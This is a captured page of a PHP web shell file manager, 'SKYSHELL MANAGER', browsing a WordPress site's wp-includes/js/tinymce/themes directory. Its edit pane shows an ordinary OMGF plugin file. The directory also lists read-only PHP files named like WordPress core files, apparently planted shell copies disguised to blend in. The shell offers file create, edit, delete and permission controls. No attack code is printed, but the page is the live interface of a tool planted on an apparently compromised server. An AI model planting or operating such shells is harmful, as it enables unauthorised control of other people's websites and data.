📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: Compatibility.php
<?php /* * * * * * * * * * * * * * * * * * * * * * * ██████╗ ███╗ ███╗ ██████╗ ███████╗ * ██╔═══██╗████╗ ████║██╔════╝ ██╔════╝ * ██║ ██║██╔████╔██║██║ ███╗█████╗ * ██║ ██║██║╚██╔╝██║██║ ██║██╔══╝ * ╚██████╔╝██║ ╚═╝ ██║╚██████╔╝██║ * ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ * * @package : OMGF * @author : Daan van den Bergh * @copyright: © 2026 Daan van den Bergh * @url : https://daan.dev * * * * * * * * * * * * * * * * * * * */ namespace OMGF; /** * @codeCoverageIgnore Because it depends on 3rd party plugins. */ class Compatibility { /** * Build class. */ public function __construct() { $this->init(); } /** * Action/filter hooks for global compatibility fixes, required in front-/back-end. * * @return void */ private function init() { add_action( 'plugins_loaded', [ $this, 'load_global_plugin_compatibility_fixes' ] ); } /** * Load Global 3rd party compatibility fixes. * * @return void */ public function load_global_plugin_compatibility_fixes() { new Compatibility\Core(); new Compatibility\CachingPlugins(); if ( defined( 'AVADA_VERSION' ) ) { new Compatibility\Avada(); } if ( defined( 'ELEMENTOR_VERSION' ) ) { new Compatibility\Elementor(); } if ( defined( 'FL_BUILDER_VERSION' ) ) { new Compatibility\BeaverBuilder(); } if ( defined( 'BRICKS_VERSION' ) ) { new Compatibility\Bricks(); } if ( defined( 'ET_BUILDER_VERSION' ) ) { new Compatibility\Divi(); } if ( defined( 'SHOW_CT_BUILDER' ) ) { new Compatibility\Oxygen(); } if ( defined( 'WPB_VC_VERSION' ) ) { new Compatibility\VisualComposer(); } } }
Save